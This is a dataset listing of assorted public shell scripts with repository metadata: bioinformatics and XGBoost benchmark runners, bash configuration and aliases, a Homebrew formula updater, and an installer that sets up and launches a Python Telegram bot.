#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL + CD + Bayesian Posterior
#-------------------------------------------------------------------------------
method_name="pLL-cd-bayPost-RF"
parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc_cd_baypost/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_177features.pkl"
braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
mat_baypost_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/posterior/"
mat_logbayfac_path=" false "
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL + CD + Bayesian likelihood (log BF)
#-------------------------------------------------------------------------------
method_name="pLL-cd-logBF-RF"
parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc_cd_baylogbf/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_127features.pkl"
braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
mat_baypost_path=" false "
mat_logbayfac_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/logbf/"
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
| true |
1e2d90152effa13f9453c308685d12cc8d18f922 | Shell | DSC-SPIDAL/harpgbdt | /run/12.LossGuide/test/run-convergence-block-depthwise.sh | UTF-8 | 1,075 | 3.125 | 3 | [] | no_license | #!/bin/bash
bin=$1
if [ -z $bin ] ; then
bin=../bin/xgboost-g++-omp-dense-halftrick-short-splitonnode-lossguide-release
fi
tagname=`basename $bin`
if [ ! -f $bin ]; then
echo "Usage: run-convergence.sh <bin>"
echo "$bin not exist, quit"
exit -1
fi
echo "run scaling test with tagname=$tagname"
export RUNID=`date +%m%d%H%M%S`
../bin/xgb-convergence.sh ${bin} higgs 1000 8 lossguide 32 500000 1 0 65536
#../bin/xgb-convergence.sh ${bin} higgs 1000 12 lossguide 32 500000 1 0 65536
#../bin/xgb-convergence.sh ${bin} higgs 1000 16 lossguide 32 500000 1 0 65536
echo "================================"
echo " Convergence Test Results:"
echo "================================"
echo -e "binname\trunid\ttrainingtime"
#find . -name "Convergence*${tagname}*.csv" -exec cat {} \; |gawk -F, '{printf("%s\t%s\t%s\t%s\n",$1,$2,$3,$6)}' |sort
echo "ls -tr */Convergence*${tagname}*${RUNID}.csv | xargs cat |gawk -F, '{printf("%s\t%s\t%s\t%s\n",$1,$2,$3,$6)}'"
ls -tr */Convergence*${tagname}*${RUNID}.csv | xargs cat |gawk -F, '{printf("%s\t%s\t%s\t%s\n",$1,$2,$3,$6)}'
| true |
91d669a93e23dc5f345cb5caffcdc2fd5a85c896 | Shell | hoshi-no-sora/memo | /Bash/set_command.sh | UTF-8 | 202 | 3.328125 | 3 | [] | no_license | #!/bin/bash
function echo_runlevel() {
set $(/sbin/runlevel)
local previous=$1
local runlevel=$2
echo "previous runlevel was $previous"
echo "current runlevel is $runlevel"
}
echo_runlevel
| true |
18d8d877ccbf4700950e25d49338f038ba67a443 | Shell | sistematico/majestic | /root/.bashrc | UTF-8 | 1,267 | 3.015625 | 3 | [] | no_license | #
# ~/.bashrc
#
##################
##### History ###
##################
# Avoid duplicates
export HISTCONTROL=ignoredups:erasedups
# Size
export HISTSIZE=10000
export HISTFILESIZE=10000
##################
##### Aliases ####
##################
if [[ -f ~/.bash_aliases ]]; then
source ~/.bash_aliases
fi
##################
##### Sources ####
##################
if [[ -f /etc/cores.inc ]]; then
source /etc/cores.inc
fi
if [[ -f /usr/share/doc/pkgfile/command-not-found.bash ]]; then
source /usr/share/doc/pkgfile/command-not-found.bash
fi
if [[ -f /usr/share/git/completion/git-prompt.sh ]]; then
source /usr/share/git/completion/git-prompt.sh
fi
# # Use bash-completion, if available
if [[ $PS1 && -f /usr/share/bash-completion/bash_completion ]]; then
source /usr/share/bash-completion/bash_completion
fi
if [ -f /usr/share/bash-completion/completions/dkms ]; then
source /usr/share/bash-completion/completions/dkms
fi
##################
##### Funções ####
##################
if [[ -f ~/.bash_functions ]]; then
source ~/.bash_functions
fi
##################
##### Prompt #####
##################
PS1="\[${Red}\][\[${Color_Off}\]\u@\h \W\[${Red}\]]\[${Color_Off}\]:\$ "
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
fortune chucknorris
echo
| true |
e89192a188060b691aa3966c3e9e033838e3fd36 | Shell | scarton/TextClean | /scripts/step4.sh | UTF-8 | 468 | 2.640625 | 3 | [] | no_license | #!/bin/bash
###############
# Step 4: Second time, Performs regex cleanups on files, writing the output files to a target directory.
###############
echo "Step 4: 2nd Regex File Cleanup"
source ./classpath.sh
cd ..
mvn -DskipTests clean package
#echo "$(cygpath -pw "$CLASSPATH")"
java -Xmx10g -Dfile.encoding=UTF-8 -classpath "$(cygpath -pw "$CLASSPATH")" cobra.textclean.batch.RegexFiles \
H:/data/Enron/output/sentences \
H:/data/Enron/output/regex2
| true |
c22a46744af928bdc0d0489083679da966c9335d | Shell | borkdude/homebrew-brew | /update-carve | UTF-8 | 476 | 3.09375 | 3 | [] | no_license | #!/usr/bin/env /bin/bash
tag=$(curl --silent "https://api.github.com/repos/borkdude/carve/tags" | jq -r '.[0].name')
version=${tag:1}
linux="carve-$version-linux-amd64.zip"
macos="carve-$version-macos-amd64.zip"
linux_sha=$(sha256sum "$linux" | cut -f 1 -d " ")
macos_sha=$(sha256sum "$macos" | cut -f 1 -d " ")
sed -e "s/\${i}/1/" -e "s/\${VERSION}/$version/g" \
-e "s/\${LINUX_SHA}/$linux_sha/g" \
-e "s/\${MACOS_SHA}/$macos_sha/g" \
carve.template > carve.rb
| true |
16d8bd6e28065dd7df2692e53c64187fd7dc4454 | Shell | NTUwanderer/NASA_Final | /server/extract_groups.sh | UTF-8 | 160 | 3.046875 | 3 | [] | no_license | #!/bin/bash
# input user_list
IFS=$'\n'
num=$(sed '4q;d' "$1")
for entry in $(tail -n $num $1); do
name=$(echo "$entry" | cut -f2 -d' ')
echo "$name"
done
| true |
272f4069b2ba8c91facf47bf9cf9c36ff9de6217 | Shell | Fcatme/qinglong | /shell/bot.sh | UTF-8 | 1,322 | 3.6875 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
if [[ -z ${BotRepoUrl} ]]; then
url="https://github.com/SuMaiKaDe/bot.git"
repo_path="${dir_repo}/dockerbot"
else
url=${BotRepoUrl}
repo_path="${dir_repo}/diybot"
fi
echo -e "\n1、安装bot依赖...\n"
apk --no-cache add -f zlib-dev gcc jpeg-dev python3-dev musl-dev freetype-dev
echo -e "\nbot依赖安装成功...\n"
echo -e "2、下载bot所需文件...\n"
if [[ ! -d ${repo_path}/.git ]]; then
rm -rf ${repo_path}
git_clone_scripts ${url} ${repo_path} "main"
fi
cp -rf "$repo_path/jbot" $dir_data
if [[ ! -f "$dir_config/bot.json" ]]; then
cp -f "$repo_path/config/bot.json" "$dir_config"
fi
echo -e "\nbot文件下载成功...\n"
echo -e "3、安装python3依赖...\n"
if [[ $PipMirror ]]; then
pip3 config set global.index-url $PipMirror
fi
cp -f "$repo_path/jbot/requirements.txt" "$dir_data"
cd $dir_data
cat requirements.txt | while read LREAD; do
if [[ ! $(pip3 show "${LREAD%%=*}" 2>/dev/null) ]]; then
pip3 --default-timeout=100 install ${LREAD}
fi
done
echo -e "\npython3依赖安装成功...\n"
echo -e "4、启动bot程序...\n"
make_dir $dir_log/bot
cd $dir_data
ps -eo pid,command | grep "python3 -m jbot" | grep -v grep | awk '{print $1}' | xargs kill -9 2>/dev/null
nohup python3 -m jbot >$dir_log/bot/nohup.log 2>&1 &
echo -e "bot启动成功...\n"
| true |
4ddb4a46d34b18373acc29194291845ffbe25340 | Shell | unusedPhD/bash-it | /aliases/available/custom.aliases.bash | UTF-8 | 1,396 | 2.859375 | 3 | [] | no_license | alias fucking=sudo
alias h='history | grep $1'
# common mispelled commands
alias xs='cd'
alias vf='cd'
alias got='git'
alias get='git'
alias gti='git'
alias claer="clear"
alias clera="clear"
alias celar="clear"
alias findgrep='grepfind'
alias mann='man'
alias updtae='update'
alias vmi='vim'
# git
alias gh='git hist'
alias gs='git status'
# tmux
alias tmux='tmux -2'
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto --group-directories-first'
alias dir='dir --color=auto'
alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# advanced ls functions
alias l='ls -l'
alias la='ls -la'
alias ll='ls -haltr'
alias lx='ls -lXB' # sort by extension
alias lk='ls -lSr' # sort by size, biggest last
alias lc='ls -ltcr' # sort by and show change time, most recent last
alias lu='ls -ltur' # sort by and show access time, most recent last
alias lt='ls -ltr' # sort by date, most recent last
alias lm='ls -al | more' # pipe through 'more'
alias lr='ls -lR' # recursive ls
alias tree='tree -Csu' # nice alternative to 'recursive ls'
[ -f ~/.config/fzf/bash ] && source ~/.config/fzf/bash
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.